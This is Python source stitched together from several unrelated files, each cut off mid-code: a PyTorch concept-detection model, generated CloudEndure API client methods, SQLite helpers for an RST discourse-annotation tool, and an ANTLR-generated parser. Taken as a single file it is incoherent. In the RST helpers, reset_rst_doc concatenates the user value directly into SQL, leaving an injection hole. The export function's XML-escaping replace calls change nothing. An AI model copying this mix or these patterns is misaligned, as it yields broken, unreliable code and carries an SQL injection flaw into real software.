self._main_model_stump = (main_model_stump,)
@property
def main_model(self) -> torch.nn.Module:
"""Shortcut to access the main model.
It is wrapped by :py:attr:`main_model_stump`.
"""
return self.main_model_stump.wrapped_model \
if self.main_model_stump is not None else None
@property
def layer_id(self) -> str:
"""Layer to extract concept from.
Shortcut to access the information from :py:attr:`main_model_stump`.
"""
return self.main_model_stump.stump_head
@property
def kernel_size(self) -> Tuple[int, ...]:
"""Size of the convolution kernel.
This is the assumed concept size in activation map pixels."""
return self.concept_layer.kernel_size
@property
def in_channels(self) -> int:
"""Number of input channels.
This is the number of output channels of layer to investigate."""
return self.concept_layer.in_channels
@property
def settings(self) -> Dict[str, Any]:
"""The current model settings as dictionary."""
return dict(
concept=self.concept,
model=self.main_model,
layer_id=self.layer_id,
kernel_size=self.kernel_size,
in_channels=self.in_channels
)
def __init__(self,
concept: Optional[SegmentationConcept2D],
model: Optional[torch.nn.Module], layer_id: Optional[str],
kernel_size: Tuple[int, int] = None, in_channels: int = None,
concept_name: str = None):
# pylint: disable=line-too-long
"""Init.
:param model: model the concept should be embedded in;
used to create (and later accessible in)
:py:attr:`main_model_stump`;
used for :py:attr:`kernel_size` and :py:attr:`in_channels`
auto-inference
:param layer_id: the layer index in
:py:meth:`~torch.nn.Module.state_dict`, the output of which is to
be fed to the the concept model; used to create (and later
accessible) in :py:attr:`main_model_stump`;
used for :py:attr:`kernel_size` and :py:attr:`in_channels`
auto-inference
:param concept: Concept to train for; must be a segmentation concept
featuring ground truth masks; used for :py:attr:`kernel_size` and
:py:attr:`in_channels` auto-inference
:param in_channels: Number of filters of the
:py:class:`~torch.nn.Conv2d`-Layer to analyse;
the value is automatically determined if ``in_channels`` or
``kernel_size`` is ``None``;
an automatically generated value overwrites a given value with a
warning
:param kernel_size: Size in activation map pixels of a window for
which to assess whether it is part of the ``concept`` or not;
by default it is determined by the relative sizes in the concept's
:py:attr:`~hybrid_learning.concepts.concepts.SegmentationConcept2D.rel_size`
and the layer output size;
if ``concept.rel_size`` is not set, :py:attr:`kernel_size` is set to
``(1, 1)`` with a warning
:param concept_name: The default value for the :py:attr:`concept_name`
property if :py:attr:`concept` is ``None``; serves as ID for
the concept model
"""
# pylint: enable=line-too-long
# Parameter post-processing:
if concept is not None:
concept: SegmentationConcept2D = SegmentationConcept2D.new(concept)
super(ConceptDetectionModel2D, self).__init__()
self._main_model_stump: Tuple[ModelStump] = \
(ModelStump(model, layer_id),) \
if model is not None else (None,)
"""Stump of the main model in the head of which to localize the
concept embedding. Used to generate the activation maps needed for
concept analysis training.
Must be wrapped into a tuple to hide the parameters from being added to
the :py:meth:`torch.nn.Module.state_dict`, since these are not to be
updated."""
self._concept: Optional[SegmentationConcept2D] = concept
"""Internal storage of the concept to localize."""
self._concept_name: Optional[str] = \
self._concept.name if self._concept is not None else concept_name
"""Default value for :py:attr:`concept_name` property
if :py:attr:`concept` is ``None``."""
# automatically determine kernel_size and in_channels if one isn't given
# (this may be time consuming as it requires one run through the model);
# automatic determination is not possible if concept.rel_size is None,
# in this case set the kernel_size to (1,1)
if in_channels is None or kernel_size is None:
if concept is None:
raise ValueError("Concept not given, so cannot auto-infer "
"sizes, but in_channels or kernel_size not "
"given.")
auto_in_channels, auto_kernel_size = \
self._layer_out_info(concept, self.main_model_stump)
if in_channels is not None and in_channels != auto_in_channels:
LOGGER.warning(
"The number of in_channels specified for %s was %d, but the"
" automatically determined value was %d; taking auto one",
self.__class__.__name__, in_channels, auto_in_channels)
in_channels = auto_in_channels
kernel_size = kernel_size \
if kernel_size is not None else auto_kernel_size
# Layers
assert len(kernel_size) == 2, \
"kernel size not of len 2: {}".format(kernel_size)
# Beware: The padding for ZeroPad2d has crude specification:
# 1. width pad, 2. height pad
self.padding = torch.nn.ZeroPad2d(
padding=same_padding((kernel_size[1], kernel_size[0])))
self.concept_layer = torch.nn.Conv2d(in_channels=in_channels,
kernel_size=kernel_size,
out_channels=1)
"""The Conv layer which is trained to detect windows
in which concept is located.
The number of input channels is automatically determined if not given
as ``in_channels`` in the ``__init__`` call.
(automatic determination requires one forward of the main model)."""
self.activation = torch.nn.Sigmoid()
"""The sigmoid activation layer to obtain heatmaps in ``[0,1]``."""
@staticmethod
def _layer_out_info(concept: SegmentationConcept2D,
main_model_stump: torch.nn.Module
) -> Tuple[int, Tuple[int]]:
# pylint: disable=line-too-long
"""Extract channel and kernel size information from model output.
This is done by collecting the layer output size from one forward run
of the model.
It is then assumed that the layer output is a tensor of shape
``(output channels/filters, height, width, ...)``, where
``height, width, ...`` is activation map shape information that
should have the same number of dimensions as the
:py:attr:`~hybrid_learning.concepts.concepts.SegmentationConcept2D.rel_size` of
the ``concept``, if this is set.
:param main_model_stump: the model of which to analyse the output;
output must be a single tensor with size of shape
``(output channels/filters, width, height, ...)``
:param concept: the concept from which to draw the dummy sample size
and the concept size
:return: tuple of
:in_channels: number of output channels of the layer) and of
:kernel_size:
the size in activation map pixels the kernel must have to
provide (up to rounding) the same aspect ratio as specified
in the :py:attr:`~hybrid_learning.concepts.concepts.SegmentationConcept2D.rel_size`
of the ``concept`` if this is set;
if ``concept.rel_size`` is not set, ``kernel_size`` is ``(1,1)``
"""
# pylint: enable=line-too-long
inp, _ = concept.train_data[0]
# layer output size without batch dimension:
layer_out_size = output_size(main_model_stump, input_size=inp.size())
# Some size checks:
# assuming layer_out_size = batch + (filters, width, height)
if len(layer_out_size) != 3:
raise AttributeError(
("The size of layer {} output was not of shape "
"(filters, width, height), but was {}"
).format(main_model_stump.stump_head, layer_out_size))
# assuming layer_out_size[1:] gives same image dimensions as
# concept.rel_size
if concept.rel_size is not None and len(concept.rel_size) != len(
layer_out_size) - 1:
raise AttributeError(
("The concept size has {} image dimensions, the layer "
"output has {}; concept size: {}, layer out size: {}"
).format(len(concept.rel_size), len(layer_out_size) - 1,
concept.rel_size, layer_out_size))
# in_channels is by default the number of output filters of the layer:
auto_in_channels: int = layer_out_size[0]
# kernel_size is by default the percentage of the layer output size
# given by concept size;
# if concept.rel_size is not set, it is (1,1)
if | |
bool
:param object body: The machine IDs for which to pause replication. (required)
:param str project_id: (required)
:return: CloudEndureMachinesListInvalidIDsAndJob
If the method is called asynchronously,
returns the request thread.
"""
kwargs["_return_http_data_only"] = True
if kwargs.get("async_req"):
return self.projects_project_id_pause_replication_post_with_http_info(
body, project_id, **kwargs
) # noqa: E501
else:
(data) = self.projects_project_id_pause_replication_post_with_http_info(
body, project_id, **kwargs
) # noqa: E501
return data
def projects_project_id_pause_replication_post_with_http_info(
self, body, project_id, **kwargs
): # noqa: E501
"""Pause replication # noqa: E501
Pause replication for given machines # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.projects_project_id_pause_replication_post_with_http_info(body, project_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param object body: The machine IDs for which to pause replication. (required)
:param str project_id: (required)
:return: CloudEndureMachinesListInvalidIDsAndJob
If the method is called asynchronously,
returns the request thread.
"""
all_params = ["body", "project_id"] # noqa: E501
all_params.append("async_req")
all_params.append("_return_http_data_only")
all_params.append("_preload_content")
all_params.append("_request_timeout")
params = locals()
for key, val in six.iteritems(params["kwargs"]):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method projects_project_id_pause_replication_post" % key
)
params[key] = val
del params["kwargs"]
# verify the required parameter 'body' is set
if "body" not in params or params["body"] is None:
raise ValueError(
"Missing the required parameter `body` when calling `projects_project_id_pause_replication_post`"
) # noqa: E501
# verify the required parameter 'project_id' is set
if "project_id" not in params or params["project_id"] is None:
raise ValueError(
"Missing the required parameter `project_id` when calling `projects_project_id_pause_replication_post`"
) # noqa: E501
collection_formats = {}
path_params = {}
if "project_id" in params:
path_params["projectId"] = params["project_id"] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if "body" in params:
body_params = params["body"]
# HTTP header `Accept`
header_params["Accept"] = self.api_client.select_header_accept(
["application/json"]
) # noqa: E501
# HTTP header `Content-Type`
header_params[
"Content-Type"
] = self.api_client.select_header_content_type( # noqa: E501
["application/json"]
) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
"/projects/{projectId}/pauseReplication",
"POST",
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type="CloudEndureMachinesListInvalidIDsAndJob", # noqa: E501
auth_settings=auth_settings,
async_req=params.get("async_req"),
_return_http_data_only=params.get("_return_http_data_only"),
_preload_content=params.get("_preload_content", True),
_request_timeout=params.get("_request_timeout"),
collection_formats=collection_formats,
)
def projects_project_id_replicas_delete(
self, body, project_id, **kwargs
): # noqa: E501
"""Perform Cleanup # noqa: E501
Spawns a cleanup job to remove the specified target machines from the cloud. Returns the job information. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.projects_project_id_replicas_delete(body, project_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param object body: The list of replica IDs to delete (corresponding to the 'replica' field in the machine object. (required)
:param str project_id: (required)
:return: CloudEndureJob
If the method is called asynchronously,
returns the request thread.
"""
kwargs["_return_http_data_only"] = True
if kwargs.get("async_req"):
return self.projects_project_id_replicas_delete_with_http_info(
body, project_id, **kwargs
) # noqa: E501
else:
(data) = self.projects_project_id_replicas_delete_with_http_info(
body, project_id, **kwargs
) # noqa: E501
return data
def projects_project_id_replicas_delete_with_http_info(
self, body, project_id, **kwargs
): # noqa: E501
"""Perform Cleanup # noqa: E501
Spawns a cleanup job to remove the specified target machines from the cloud. Returns the job information. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.projects_project_id_replicas_delete_with_http_info(body, project_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param object body: The list of replica IDs to delete (corresponding to the 'replica' field in the machine object. (required)
:param str project_id: (required)
:return: CloudEndureJob
If the method is called asynchronously,
returns the request thread.
"""
all_params = ["body", "project_id"] # noqa: E501
all_params.append("async_req")
all_params.append("_return_http_data_only")
all_params.append("_preload_content")
all_params.append("_request_timeout")
params = locals()
for key, val in six.iteritems(params["kwargs"]):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method projects_project_id_replicas_delete" % key
)
params[key] = val
del params["kwargs"]
# verify the required parameter 'body' is set
if "body" not in params or params["body"] is None:
raise ValueError(
"Missing the required parameter `body` when calling `projects_project_id_replicas_delete`"
) # noqa: E501
# verify the required parameter 'project_id' is set
if "project_id" not in params or params["project_id"] is None:
raise ValueError(
"Missing the required parameter `project_id` when calling `projects_project_id_replicas_delete`"
) # noqa: E501
collection_formats = {}
path_params = {}
if "project_id" in params:
path_params["projectId"] = params["project_id"] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if "body" in params:
body_params = params["body"]
# HTTP header `Accept`
header_params["Accept"] = self.api_client.select_header_accept(
["application/json"]
) # noqa: E501
# HTTP header `Content-Type`
header_params[
"Content-Type"
] = self.api_client.select_header_content_type( # noqa: E501
["application/json"]
) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
"/projects/{projectId}/replicas",
"DELETE",
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type="CloudEndureJob", # noqa: E501
auth_settings=auth_settings,
async_req=params.get("async_req"),
_return_http_data_only=params.get("_return_http_data_only"),
_preload_content=params.get("_preload_content", True),
_request_timeout=params.get("_request_timeout"),
collection_formats=collection_formats,
)
def projects_project_id_restore_files_post(
self, body, project_id, **kwargs
): # noqa: E501
"""Restore selected files in a backup project # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.projects_project_id_restore_files_post(body, project_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param CloudEndureRestoreFilesParameters body: A list of file origins, each origin includes file path, machine id, and pit id. (required)
:param str project_id: (required)
:return: CloudEndureJob
If the method is called asynchronously,
returns the request thread.
"""
kwargs["_return_http_data_only"] = True
if kwargs.get("async_req"):
return self.projects_project_id_restore_files_post_with_http_info(
body, project_id, **kwargs
) # noqa: E501
else:
(data) = self.projects_project_id_restore_files_post_with_http_info(
body, project_id, **kwargs
) # noqa: E501
return data
def projects_project_id_restore_files_post_with_http_info(
self, body, project_id, **kwargs
): # noqa: E501
"""Restore selected files in a backup project # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.projects_project_id_restore_files_post_with_http_info(body, project_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param CloudEndureRestoreFilesParameters body: A list of file origins, each origin includes file path, machine id, and pit id. (required)
:param str project_id: (required)
:return: CloudEndureJob
If the method is called asynchronously,
returns the request thread.
"""
all_params = ["body", "project_id"] # noqa: E501
all_params.append("async_req")
all_params.append("_return_http_data_only")
all_params.append("_preload_content")
all_params.append("_request_timeout")
params = locals()
for key, val in six.iteritems(params["kwargs"]):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method projects_project_id_restore_files_post" % key
)
params[key] = val
del params["kwargs"]
# verify the required parameter 'body' is set
if "body" not in params or params["body"] is None:
raise ValueError(
"Missing the required parameter `body` when calling `projects_project_id_restore_files_post`"
) # noqa: E501
# verify the required parameter 'project_id' is set
if "project_id" not in params or params["project_id"] is None:
raise ValueError(
"Missing the required parameter `project_id` when calling `projects_project_id_restore_files_post`"
) # noqa: E501
collection_formats = {}
path_params = {}
if "project_id" in params:
path_params["projectId"] = params["project_id"] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if "body" in params:
body_params = params["body"]
# HTTP header `Accept`
header_params["Accept"] = self.api_client.select_header_accept(
["application/json"]
) # noqa: E501
# HTTP header `Content-Type`
header_params[
"Content-Type"
] = self.api_client.select_header_content_type( # noqa: E501
["application/json"]
) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
"/projects/{projectId}/restoreFiles",
"POST",
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type="CloudEndureJob", # noqa: E501
auth_settings=auth_settings,
async_req=params.get("async_req"),
_return_http_data_only=params.get("_return_http_data_only"),
_preload_content=params.get("_preload_content", True),
_request_timeout=params.get("_request_timeout"),
collection_formats=collection_formats,
)
def projects_project_id_reverse_replication_post(
self, project_id, **kwargs
): # noqa: E501
"""Reverse replication direction # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.projects_project_id_reverse_replication_post(project_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str project_id: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs["_return_http_data_only"] = True
if kwargs.get("async_req"):
return self.projects_project_id_reverse_replication_post_with_http_info(
project_id, **kwargs
) # noqa: E501
else:
(data) = self.projects_project_id_reverse_replication_post_with_http_info(
project_id, **kwargs
) # noqa: E501
return data
def projects_project_id_reverse_replication_post_with_http_info(
self, project_id, **kwargs
): # | |
child, change all children to this relation
generic_query("UPDATE rst_nodes SET relname=? WHERE id=? and doc=? and project=? and user=?",(new_rel,node_id,doc,project,user))
children = get_children(parent_id,doc,project,user)
for child in children:
if get_rel_type(get_rel(child[0],doc,project,user),doc,project) == "multinuc":
generic_query("UPDATE rst_nodes SET relname=? WHERE id=? and doc=? and project=? and user=?",(new_rel,child[0],doc,project,user))
else:
generic_query("UPDATE rst_nodes SET relname=? WHERE id=? and doc=? and project=? and user=?",(new_rel,node_id,doc,project,user))
def count_children(node_id,doc,project,user):
count = generic_query("SELECT count(*) FROM rst_nodes WHERE parent=? and doc=? and project=? and user=?",(node_id,doc,project,user))
return int(count[0][0])
def count_multinuc_children(node_id,doc,project,user):
count = generic_query("SELECT count(rst_nodes.id) FROM rst_nodes JOIN rst_relations ON rst_nodes.relname = rst_relations.relname and rst_nodes.doc = rst_relations.doc and rst_nodes.project = rst_relations.project WHERE reltype = 'multinuc' and parent=? and rst_nodes.doc=? and rst_nodes.project=? and user=?",(node_id,doc,project,user))
return int(count[0][0])
def get_multinuc_children_lr(node_id,doc,project,user):
lr = generic_query("SELECT min(rst_nodes.left), max(rst_nodes.right) FROM rst_nodes JOIN rst_relations ON rst_nodes.relname = rst_relations.relname and rst_nodes.doc = rst_relations.doc and rst_nodes.project = rst_relations.project WHERE reltype = 'multinuc' and parent=? and rst_nodes.doc=? and rst_nodes.project=? and user=?",(node_id,doc,project,user))
return [int(lr[0][0]),int(lr[0][1])]
def get_multinuc_children_lr_ids(node_id,left,right,doc,project,user):
id_left = generic_query("SELECT id FROM rst_nodes JOIN rst_relations ON rst_nodes.relname = rst_relations.relname and rst_nodes.doc = rst_relations.doc and rst_nodes.project = rst_relations.project WHERE reltype = 'multinuc' and parent=? and rst_nodes.left=? and rst_nodes.doc=? and rst_nodes.project=? and user=? ORDER BY rst_nodes.left",(node_id,left,doc,project,user))
id_right = generic_query("SELECT id FROM rst_nodes JOIN rst_relations ON rst_nodes.relname = rst_relations.relname and rst_nodes.doc = rst_relations.doc and rst_nodes.project = rst_relations.project WHERE reltype = 'multinuc' and parent=? and rst_nodes.right=? and rst_nodes.doc=? and rst_nodes.project=? and user=? ORDER BY rst_nodes.left",(node_id,right,doc,project,user))
return id_left[0][0],id_right[0][0]
def count_span_children(node_id,doc,project,user):
count = generic_query("SELECT count(id) FROM rst_nodes WHERE relname = 'span' and parent=? and rst_nodes.doc=? and rst_nodes.project=? and user=?",(node_id,doc,project,user))
return int(count[0][0])
def node_exists(node_id,doc,project,user):
count = generic_query("SELECT count(*) FROM rst_nodes WHERE id=? and doc=? and project=? and user=?",(node_id,doc,project,user))
return int(count[0][0])>0
def get_rel_type(relname,doc,project):
if relname=="span" or relname=="":
return "span"
else:
return generic_query("SELECT reltype from rst_relations WHERE relname=? and doc=? and project=?",(relname,doc,project))[0][0]
def delete_node(node_id,doc,project,user):
if node_exists(node_id,doc,project,user):
parent = get_parent(node_id,doc,project,user)
if not get_kind(node_id,doc,project,user) == "edu": # If it's not an EDU, it may be deleted
# If there are still any children, such as rst relations to a deleted span or multinuc, set their parent to 0
old_children = get_children(node_id,doc,project,user)
for child in old_children:
if len(child[0])>0:
update_parent(child[0],"0",doc,project,user)
generic_query("DELETE FROM rst_nodes WHERE id=? and doc=? and project=? and user=?",(node_id,doc,project,user))
generic_query("DELETE FROM rst_signals WHERE source=? and doc=? and project=? and user=?",(node_id,doc,project,user))
if not parent=="0":
if not count_children(parent,doc,project,user)>0:
delete_node(parent,doc,project,user)
elif get_kind(parent,doc,project,user)=="span" and count_span_children(parent,doc,project,user)==0: # Span just lost its last span child, delete it
delete_node(parent,doc,project,user)
elif get_kind(parent,doc,project,user)=="multinuc" and count_multinuc_children(parent,doc,project,user)==0: # Multinuc just lost its last multinuc child, delete it
delete_node(parent,doc,project,user)
def insert_parent(node_id,new_rel,node_kind,doc,project,user):
lr = get_node_lr(node_id,doc,project,user)
old_parent = get_parent(node_id,doc,project,user)
old_rel = get_rel(node_id,doc,project,user)
new_parent = str(get_max_node_id(doc,project,user) + 1)
add_node(new_parent,lr[0],lr[1],old_parent,old_rel,"",node_kind,doc,project,user)
update_parent(node_id,new_parent,doc,project,user)
update_rel(node_id,new_rel,doc,project,user)
def reset_rst_doc(doc,project,user):
generic_query("DELETE FROM rst_nodes WHERE doc=? and project=? and user=?",(doc,project,user))
generic_query("""INSERT INTO rst_nodes (id, left, right, parent, depth, kind, contents, relname, doc, project, user)
SELECT id, left, right, parent, depth, kind, contents, relname, doc, project, '""" + user + "' FROM rst_nodes WHERE doc=? and project=? and user='_orig'""",(doc,project))
generic_query("DELETE FROM rst_signals WHERE doc=? and project=? and user=?",(doc,project,user))
generic_query("""INSERT INTO rst_signals (source, type, subtype, tokens, doc, project, user)
SELECT source, type, subtype, tokens, doc, project, '""" + user + "' FROM rst_signals WHERE doc=? and project=? and user='_orig'""",(doc,project))
def get_children(parent,doc,project,user):
return generic_query("SELECT id from rst_nodes WHERE parent=? and doc=? and project=? and user=?",(parent,doc,project,user))
def get_max_node_id(doc,project,user):
return generic_query("SELECT max(CAST (id as decimal)) as max_id from rst_nodes WHERE doc=? and project=? and user=?",(doc,project,user))[0][0]
def get_max_right(doc,project,user):
return generic_query("SELECT max(right) as max_right from rst_nodes WHERE doc=? and project=? and user=?",(doc,project,user))[0][0]
def get_users(doc,project):
return generic_query("SELECT user from rst_nodes WHERE doc=? and project=? and not user='_orig'",(doc,project))
def generic_query(sql,params):
dbpath = os.path.dirname(os.path.realpath(__file__)) + os.sep +".."+os.sep+"rstweb.db"
conn = sqlite3.connect(dbpath)
with conn:
cur = conn.cursor()
cur.execute(sql,params)
rows = cur.fetchall()
return rows
def export_document(doc, project,exportdir):
doc_users = get_users(doc,project)
for user in doc_users:
this_user = user[0]
rst_out = get_export_string(doc, project, this_user)
filename = project + "_" + doc + "_" + this_user + ".rs3"
f = codecs.open(exportdir + filename, 'w','utf-8')
f.write(rst_out)
def get_export_string(doc, project, user):
rels = get_rst_rels(doc,project)
nodes = get_rst_doc(doc,project,user)
signals = get_signals(doc,project,user)
rst_out = '''<rst>
\t<header>
\t\t<relations>
'''
for rel in rels:
relname_string = re.sub(r'_[rm]$','',rel[0])
rst_out += '\t\t\t<rel name="' + relname_string + '" type="' + rel[1] + '"/>\n'
rst_out += '''\t\t</relations>
\t</header>
\t<body>
'''
for node in nodes:
if node[5] == "edu":
if len(node[7]) > 0:
relname_string = re.sub(r'_[rm]$','',node[7])
else:
relname_string = ""
if node[3] == "0":
parent_string = ""
relname_string = ""
else:
parent_string = 'parent="'+node[3]+'" '
if len(relname_string) > 0:
relname_string = 'relname="' + relname_string+'"'
contents = node[6]
# Handle XML escapes
contents = re.sub(r'&([^ ;]*) ',r'&\1 ',contents)
contents = re.sub(r'&$','&',contents)
contents = contents.replace(">",">").replace("<","<")
rst_out += '\t\t<segment id="'+node[0]+'" '+ parent_string + relname_string+'>'+contents+'</segment>\n'
for node in nodes:
if node[5] != "edu":
if len(node[7]):
relname_string = re.sub(r'_[rm]$','',node[7])
relname_string = 'relname="'+relname_string+'"'
else:
relname_string = ""
if node[3] == "0":
parent_string = ""
relname_string = ""
else:
parent_string = 'parent="'+node[3]+'"'
if len(relname_string) > 0:
parent_string += ' '
rst_out += '\t\t<group id="'+node[0]+'" type="'+node[5]+'" ' + parent_string + relname_string+'/>\n'
if len(signals) > 0:
rst_out += "\t\t<signals>\n"
for signal in signals:
source, signal_type, signal_subtype, tokens = signal
rst_out += '\t\t\t<signal source="' + source + '" type="' + signal_type + '" subtype="' + signal_subtype + '" tokens="' + tokens + '"/>\n'
rst_out += "\t\t</signals>\n"
rst_out += '''\t</body>
</rst>'''
return rst_out
def delete_document(doc,project):
generic_query("DELETE FROM rst_nodes WHERE doc=? and project=?",(doc,project))
generic_query("DELETE FROM rst_relations WHERE doc=? and project=?",(doc,project))
generic_query("DELETE FROM rst_signals WHERE doc=? and project=?",(doc,project))
generic_query("DELETE FROM docs WHERE doc=? and project=?",(doc,project))
def delete_project(project):
generic_query("DELETE FROM rst_nodes WHERE project=?",(project,))
generic_query("DELETE FROM rst_relations WHERE project=?",(project,))
generic_query("DELETE FROM rst_signals WHERE project=?",(project,))
generic_query("DELETE FROM docs WHERE project=?",(project,))
generic_query("DELETE FROM projects WHERE project=?",(project,))
def insert_seg(token_num, doc, project, user):
tok_seg_map = get_tok_map(doc,project,user)
seg_to_split = tok_seg_map[token_num]
push_up(int(seg_to_split),doc,project,user)
parts = get_split_text(token_num,doc,project,user)
update_seg_contents(seg_to_split,parts[0].strip(),doc,project,user)
add_seg(str(int(seg_to_split)+1),parts[1].strip(),doc,project,user)
def get_tok_map(doc,project,user):
rows = generic_query("SELECT id, contents FROM rst_nodes WHERE kind='edu' and doc=? and project=? and user=? ORDER BY CAST(id AS int)",(doc,project,user))
all_tokens = {}
token_counter = 0
for row in rows:
edu_text = row[1].strip()
edu_tokens = edu_text.split(" ")
for token in edu_tokens:
token_counter += 1
all_tokens[token_counter] = row[0]
return all_tokens
def push_up(push_above_this_seg,doc,project,user):
ids_above_push = generic_query("SELECT id from rst_nodes WHERE CAST(id as int) > ? and doc=? and project=? and user=? ORDER BY CAST(id as int) DESC",(push_above_this_seg,doc,project,user))
for row in ids_above_push: #Do this row-wise to avoid sqlite unique constraint behavior
id_to_increment = row[0]
generic_query("UPDATE rst_nodes set id = CAST((CAST(id as int) + 1) as text) WHERE id=? and doc=? and project=? and user=?",(id_to_increment,doc,project,user))
generic_query("UPDATE rst_signals set source = CAST((CAST(source as int) + 1) as text) WHERE source=? and doc=? and project=? and user=?",(id_to_increment,doc,project,user))
generic_query("UPDATE rst_nodes set parent = CAST((CAST(parent as int) + 1) as text) WHERE CAST(parent as int)>? and doc=? and project=? and user=?",(push_above_this_seg,doc,project,user))
generic_query("UPDATE rst_nodes set left = left + 1 WHERE left>? and doc=? and project=? and user=?",(push_above_this_seg,doc,project,user))
generic_query("UPDATE rst_nodes set right = right + 1 WHERE right>? and doc=? and project=? and user=?",(push_above_this_seg,doc,project,user))
def push_down(push_above_this_seg,doc,project,user):
ids_above_push = generic_query("SELECT id from rst_nodes WHERE CAST(id as int) > ? and doc=? and project=? and user=? ORDER BY CAST(id as int)",(push_above_this_seg,doc,project,user))
for row in ids_above_push: #Do this row-wise to avoid sqlite unique constraint behavior
id_to_decrement = row[0]
generic_query("UPDATE rst_nodes set id = CAST((CAST(id as int) - 1) as text) WHERE id=? and doc=? and project=? and user=?",(id_to_decrement,doc,project,user))
generic_query("UPDATE rst_signals set source = CAST((CAST(source as int) - 1) as text) WHERE source=? and doc=? and project=? and user=?",(id_to_decrement,doc,project,user))
generic_query("UPDATE rst_nodes set parent = CAST((CAST(parent as int) - 1) as text) WHERE CAST(parent as int)>? and doc=? and project=? and user=?",(push_above_this_seg,doc,project,user))
generic_query("UPDATE rst_nodes set left = left - 1 WHERE left>? and doc=? and project=? and user=?",(push_above_this_seg,doc,project,user))
generic_query("UPDATE rst_nodes set right = right - 1 WHERE right>? and doc=? and project=? and user=?",(push_above_this_seg,doc,project,user))
def get_split_text(tok_num,doc,project,user):
rows = generic_query("SELECT id, contents FROM rst_nodes WHERE kind='edu' and doc=? and project=? and user=? ORDER BY CAST(id AS int)",(doc,project,user))
token_counter = 0
do_return = False
final = []
part1 = ""
part2 = ""
for row in rows:
if do_return:
do_return = False
final = [part1.strip(),part2.strip()]
else:
part1 = ""
part2 = ""
edu_text = row[1].strip()
edu_tokens = edu_text.split(" ")
for token in edu_tokens:
token_counter += 1
if do_return == False:
part1+=token + " "
else:
part2+=token + " "
if tok_num == token_counter:
do_return = True
if do_return:
final = [part1.strip(),part2.strip()]
return final
def update_seg_contents(id,contents,doc,project,user):
generic_query("UPDATE rst_nodes set contents=? WHERE id=? and doc=? and project=? and user=?",(contents,id,doc,project,user))
def get_seg_contents(id,doc,project,user):
return generic_query("SELECT contents from rst_nodes WHERE id=? and doc=? and project=? and user=?",(id,doc,project,user))[0][0]
def add_seg(id,contents,doc,project,user):
generic_query("INSERT INTO rst_nodes VALUES(?,?,?,?,?,?,?,?,?,?,?)", (id,id,id,"0","0","edu",contents,get_def_rel("rst",doc,project),doc,project,user))
def merge_seg_forward(last_tok_num,doc,project,user):
tok_seg_map = get_tok_map(doc,project,user)
seg_to_merge_forward = tok_seg_map[last_tok_num]
part1 = get_seg_contents(str(seg_to_merge_forward),doc,project,user)
part2 = get_seg_contents(str(int(seg_to_merge_forward)+1),doc,project,user)
update_seg_contents(seg_to_merge_forward,part1+" "+part2,doc,project,user)
### TODO: WE need to unlink not just the EDU, but also anybody who has a parent or ancestor of that should have parent=0
#delete_node(get_parent(str(int(seg_to_merge_forward)+1),doc,project,user),doc,project,user)
#unlink_children(str(int(seg_to_merge_forward)+1),doc,project,user)
#unlink the edu marked for deletion
update_parent(str(int(seg_to_merge_forward)+1),"0",doc,project,user)
children = get_children(str(int(seg_to_merge_forward)+1),doc,project,user)
#unlink its children
for child in children:
update_parent(child[0],"0",doc,project,user)
#remove it from the database
generic_query("DELETE FROM rst_nodes WHERE id=? and doc=? and project=? and user=?",(str(int(seg_to_merge_forward)+1),doc,project,user))
generic_query("DELETE FROM rst_signals WHERE source=? and doc=? and project=? and user=?",(str(int(seg_to_merge_forward)+1),doc,project,user))
push_down(int(seg_to_merge_forward),doc,project,user)
def copy_doc_to_user(doc, project, user):
doc_to_copy = generic_query("SELECT id, left, right, parent, depth, kind, contents, relname, doc, project FROM rst_nodes WHERE doc=? and project=? and user='_orig'", (doc,project))
copy = []
for row in doc_to_copy:
row += (user,)
copy += (row,)
dbpath = os.path.dirname(os.path.realpath(__file__)) + os.sep +".."+os.sep+"rstweb.db"
conn = sqlite3.connect(dbpath)
cur = conn.cursor()
cur.executemany('INSERT INTO rst_nodes VALUES(?,?,?,?,?,?,?,?,?,?,?)', copy)
cur.execute("INSERT INTO docs VALUES (?,?,?)", (doc,project,user))
conn.commit()
signals_to_copy = generic_query("SELECT source, type, subtype, tokens, doc, project FROM rst_signals WHERE doc=? and | |
if _la==MyGrammerParser.ENDEND:
self.state = 144
self.declare_ending_end()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ExprContext(ParserRuleContext):
__slots__ = 'parser'
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return MyGrammerParser.RULE_expr
def copyFrom(self, ctx:ParserRuleContext):
